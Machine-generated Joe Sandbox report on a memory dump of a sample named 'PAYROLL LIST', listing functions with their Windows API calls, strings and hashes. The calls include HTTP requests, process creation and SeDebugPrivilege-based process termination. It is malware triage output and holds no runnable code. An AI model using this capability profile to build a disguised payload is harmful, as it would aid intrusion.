close all, xrefs: 00A230D7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a8d6974d7817c257c0ba46c3d6c2592bc511558aa804ce7c6920fefd517ee716
Instruction ID: eadbeab23924b3f50640a1d6adad89582b8236950c12f1eeec7c585716c7ef3f
Opcode Fuzzy Hash: a8d6974d7817c257c0ba46c3d6c2592bc511558aa804ce7c6920fefd517ee716
Instruction Fuzzy Hash: DD912D31700212CFCB05EF68E996A68F3B4FF16304F5482B9E50A67662DB34AE56CF54

Function 00A3CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A3CC15

Part of subcall function 00A3CCCD: GetClientRect.USER32(?,?), ref: 00A3CCF6
Part of subcall function 00A3CCCD: GetWindowRect.USER32(?,?), ref: 00A3CD37
Part of subcall function 00A3CCCD: ScreenToClient.USER32(?,?), ref: 00A3CD5F

GetDC.USER32 ref: 00A9D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A9D14A
SelectObject.GDI32(00000000,00000000), ref: 00A9D158
SelectObject.GDI32(00000000,00000000), ref: 00A9D16D
ReleaseDC.USER32(?,00000000), ref: 00A9D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A9D200

Strings

U, xrefs: 00A9D0D5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 38583bc8640ddf1b56f83b58eb4b3a52f75de3244c5ebc9949b6fb457dd4ac76
Instruction ID: b43232e0df1bde98439c668502b82e77f963600e4ea49bccb3c1590f06ceb925
Opcode Fuzzy Hash: 38583bc8640ddf1b56f83b58eb4b3a52f75de3244c5ebc9949b6fb457dd4ac76
Instruction Fuzzy Hash: 9871BE31600205DFCF21DF64CD85AEA7BB5FF49364F244269FD566A2A6C7318882DB60

Function 00A8ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

Part of subcall function 00A3B63C: GetCursorPos.USER32(000000FF), ref: 00A3B64F
Part of subcall function 00A3B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00A3B66C
Part of subcall function 00A3B63C: GetAsyncKeyState.USER32(00000001), ref: 00A3B691
Part of subcall function 00A3B63C: GetAsyncKeyState.USER32(00000002), ref: 00A3B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00A8ED3C
ImageList_EndDrag.COMCTL32 ref: 00A8ED42
ReleaseCapture.USER32 ref: 00A8ED48
SetWindowTextW.USER32(?,00000000), ref: 00A8EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A8EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00A8EEDC

Strings

@GUI_DRAGFILE, xrefs: 00A8EE77
@GUI_DROPID, xrefs: 00A8EE33

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: e5d997b38ae6136f77ccb228f9b818a6d168a2ed7b08ab037da1eee60c52b11e
Instruction ID: 97baadbdcb0c84899789b6a7f58d7892688095fadf5fd7022822ffe123066d44
Opcode Fuzzy Hash: e5d997b38ae6136f77ccb228f9b818a6d168a2ed7b08ab037da1eee60c52b11e
Instruction Fuzzy Hash: FD51BB70204304AFD710EF64DC96FAA77E5FB88714F00492DF9969B2E2DB709945CB52

Function 00A745C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A745FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A7462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A7466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A74682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A7468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A746BF
InternetCloseHandle.WININET(00000000), ref: 00A74706

Part of subcall function 00A75052: GetLastError.KERNEL32(?,?,00A743CC,00000000,00000000,00000001), ref: 00A75067

Strings

, xrefs: 00A746B8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 497020649eccb56a7ba6de5544b4ce9b711b81570063b369e2b3943b4e7d3fef
Instruction ID: eb6403efed2a8d1bfb5d88120b052b2e0b9646b53bfcc97fa7fa2bd331f90db5
Opcode Fuzzy Hash: 497020649eccb56a7ba6de5544b4ce9b711b81570063b369e2b3943b4e7d3fef
Instruction Fuzzy Hash: 12417CB1501219BFEB059FA0CC85FBB7BACFF09314F00C026FA499A191D7B09D458BA4

Function 00A7B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00ABDC00), ref: 00A7B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00ABDC00), ref: 00A7B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A7B8C1
SysFreeString.OLEAUT32(?), ref: 00A7B8EB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: fcb19205347c526c90180f684cd63c863387d40a1286cf65e1feb762658e921e
Instruction ID: 14eb8ca1a922aa00aa3b654395ea99eb97026bd418b28986251ce567b2f5cc1d
Opcode Fuzzy Hash: fcb19205347c526c90180f684cd63c863387d40a1286cf65e1feb762658e921e
Instruction Fuzzy Hash: 9FF107B5A10209EFCB04DF94C884EAEB7B9FF49315F10C459F919AB251DB31AE45CBA0

Function 00A824D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A824F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A82688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A826AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A826EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A8286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A828A1
CloseHandle.KERNEL32(?), ref: 00A828D0
CloseHandle.KERNEL32(?), ref: 00A82947

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: e18318f73fe0ba42fa0453df32e75c369c21e3a270a10885af3a68eb94fbcc82
Instruction ID: 7f80fdc1c3ce4f35d276c061f6ebdebe51c34e68b7473c08949851f5df5be50b
Opcode Fuzzy Hash: e18318f73fe0ba42fa0453df32e75c369c21e3a270a10885af3a68eb94fbcc82
Instruction Fuzzy Hash: 01D19C31604201DFCB14EF24D991B6ABBE5BF85320F14896DF89A9B2A2DB31DC45CB52

Function 00A8B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A8B3F4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 448bd1c82793acf63618b131c760b4a306a8747036fa7be980bc604a0a1201c4
Instruction ID: 40febef30ee8554c6c17523facb9e50bc50faa7d7f581d6be2feeea0a2129603
Opcode Fuzzy Hash: 448bd1c82793acf63618b131c760b4a306a8747036fa7be980bc604a0a1201c4
Instruction Fuzzy Hash: 0151A130520214BBEF24FF68CD8ABAD3B75EB05314F644111F656EA6E2D771E9448B60

Function 00A3A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A9DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A9DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A9DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A9DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A9DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00A3A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00A9DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A9DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00A3A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00A9DBC8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 3a5d1bb53d7e2069085149238164745b5ae3c86da5a01325b845d6bdd78b1b4c
Instruction ID: 57fdc300cddf07a07d3a66352fb3642c7600a8ff8d847e4bd7856659308c7c4e
Opcode Fuzzy Hash: 3a5d1bb53d7e2069085149238164745b5ae3c86da5a01325b845d6bdd78b1b4c
Instruction Fuzzy Hash: 0B516970600219EFDB24DF68CD82FAA7BF9AB18754F100619F986DB6D0D7B0AD81DB50

Function 00A67555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A66EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A65FA6,?), ref: 00A66ED8

Part of subcall function 00A66EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A65FA6,?), ref: 00A66EF1

Part of subcall function 00A672CB: GetFileAttributesW.KERNEL32(?,00A66019), ref: 00A672CC

lstrcmpiW.KERNEL32(?,?), ref: 00A675CA
_wcscmp.LIBCMT ref: 00A675E2
MoveFileW.KERNEL32(?,?), ref: 00A675FB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 1bc83289b2450532119f1bba6178a473ea6bbee48de079bf49e2703bf828d9f4
Instruction ID: 68682355942b80af4f5598fe00dbc8e2eed6371c862723786d9ca8155b9b1377
Opcode Fuzzy Hash: 1bc83289b2450532119f1bba6178a473ea6bbee48de079bf49e2703bf828d9f4
Instruction Fuzzy Hash: D45130B2E092299ADF50EBA4D981DDE73BC9F48314F0040AAF605E3541EA7497C9CB60

Function 00A3EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00A9DAD1,00000004,00000000,00000000), ref: 00A3EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00A9DAD1,00000004,00000000,00000000), ref: 00A3EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00A9DAD1,00000004,00000000,00000000), ref: 00A9DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00A9DAD1,00000004,00000000,00000000), ref: 00A9DCF2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 4e827981eeba78ac7de0ed892ce73e934605994af940e9a9851fcca9ea999b2d
Instruction ID: e01d9bd96942a5c9b005317c376acada6b1003ee5281f707c2f0a29da0719377
Opcode Fuzzy Hash: 4e827981eeba78ac7de0ed892ce73e934605994af940e9a9851fcca9ea999b2d
Instruction Fuzzy Hash: F841D6707152819ADB3ACF388D8DA6AFAE6EB42305F198409F087869E1D770BC81D711

Function 00A5B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A5AEF1,00000B00,?,?), ref: 00A5B26C
HeapAlloc.KERNEL32(00000000,?,00A5AEF1,00000B00,?,?), ref: 00A5B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A5AEF1,00000B00,?,?), ref: 00A5B288
GetCurrentProcess.KERNEL32(?,00000000,?,00A5AEF1,00000B00,?,?), ref: 00A5B290
DuplicateHandle.KERNEL32(00000000,?,00A5AEF1,00000B00,?,?), ref: 00A5B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A5AEF1,00000B00,?,?), ref: 00A5B2A3
GetCurrentProcess.KERNEL32(00A5AEF1,00000000,?,00A5AEF1,00000B00,?,?), ref: 00A5B2AB
DuplicateHandle.KERNEL32(00000000,?,00A5AEF1,00000B00,?,?), ref: 00A5B2AE
CreateThread.KERNEL32(00000000,00000000,00A5B2D4,00000000,00000000,00000000), ref: 00A5B2C8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: d4cbd57b7a968474050ac1f334dec4cb2abc3f8a2017a25c47451a1ee33db132
Instruction ID: bdbbefe35a809a7663f951ad20f5dc1eb2758f890e2c0fcfaddbe698e55e7f3c
Opcode Fuzzy Hash: d4cbd57b7a968474050ac1f334dec4cb2abc3f8a2017a25c47451a1ee33db132
Instruction Fuzzy Hash: 9B01A8B5240305BFEA10EBA5DC49F6B7BACEB89711F018411FA46DB5E1CB7498018B71

Function 00A7C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00A7C49E
NULL Pointer assignment, xrefs: 00A7C876, 00A7C887

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e070ded24c34b5d792fdcf99b8f7deb815a935894d99410970e11f09111ce30d
Instruction ID: 07e84ca505e4bf48bc4cd7b5d79c7209a992545c4e5a59163e9ca217e3c019db
Opcode Fuzzy Hash: e070ded24c34b5d792fdcf99b8f7deb815a935894d99410970e11f09111ce30d
Instruction Fuzzy Hash: 1CE1B471A00219AFDF14DFA8DD85AAE77B9EF48724F14C12DF909AB281D770AD41CB90

Function 00A7BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7BB5C
VariantInit.OLEAUT32(?), ref: 00A7BC2D
VariantInit.OLEAUT32(?), ref: 00A7BD2E
VariantClear.OLEAUT32(?), ref: 00A7BD38
VariantClear.OLEAUT32(?), ref: 00A7BD99

Strings

Null Object assignment in FOR..IN loop, xrefs: 00A7BBBD, 00A7BCEB, 00A7BDA7
Incorrect Object type in FOR..IN loop, xrefs: 00A7BD11

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: be8eed206a5387f5b103d7fb56d21c4e654498e3784a1eaae18a539b0e4d3aa4
Instruction ID: 98857e00d70f129a29c54c9cca6eb049575debc39ad2710ffac36ace4986b15d
Opcode Fuzzy Hash: be8eed206a5387f5b103d7fb56d21c4e654498e3784a1eaae18a539b0e4d3aa4
Instruction Fuzzy Hash: 049181B1A10219EBDF24CF95CC44FAEB7B8EF89710F10C55AF51AAB281D7709944CBA0

Function 00A89A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A89B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00A89B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A89B47
_wcscat.LIBCMT ref: 00A89BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A89BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A89BE7

Strings

SysListView32, xrefs: 00A89AEB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 034484218ea2882febe5f195bcfa77dfebe1535f4887413cb313f7c4b3713c9e
Instruction ID: dcbe2251f7f0ae428555b85f76842e2870f21eeb881f081bc01f38b195cc8f08
Opcode Fuzzy Hash: 034484218ea2882febe5f195bcfa77dfebe1535f4887413cb313f7c4b3713c9e
Instruction Fuzzy Hash: E1419E71A00348AFDB21EFA4DC89BEF77A8EF48350F14442AF589A7291D7719D85CB60

Function 00A8172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00A66532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00A66554
Part of subcall function 00A66532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00A66564
Part of subcall function 00A66532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A665F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8179A
GetLastError.KERNEL32 ref: 00A817AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A817D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A81855
GetLastError.KERNEL32(00000000), ref: 00A81860
CloseHandle.KERNEL32(00000000), ref: 00A81895

Strings

SeDebugPrivilege, xrefs: 00A817B8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: c43da887a04c9ee9ef6d3f03c968c18827a2ed07c579329ba350497c91be2f9b
Instruction ID: 8feb1538358002e99371428386275f129e2e8b04afd42645dcdea3d09fd7d191
Opcode Fuzzy Hash: c43da887a04c9ee9ef6d3f03c968c18827a2ed07c579329ba350497c91be2f9b
Instruction Fuzzy Hash: 8F41BC72700201AFDF05EF98D9A6FADB7B5AF04310F04C059F9469F2C2DB74A9068B91

Function 00A65819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00A658B8

Strings

question, xrefs: 00A65871
info, xrefs: 00A65859
blank, xrefs: 00A6583A
warning, xrefs: 00A658A1
stop, xrefs: 00A65889

Memory Dump Source

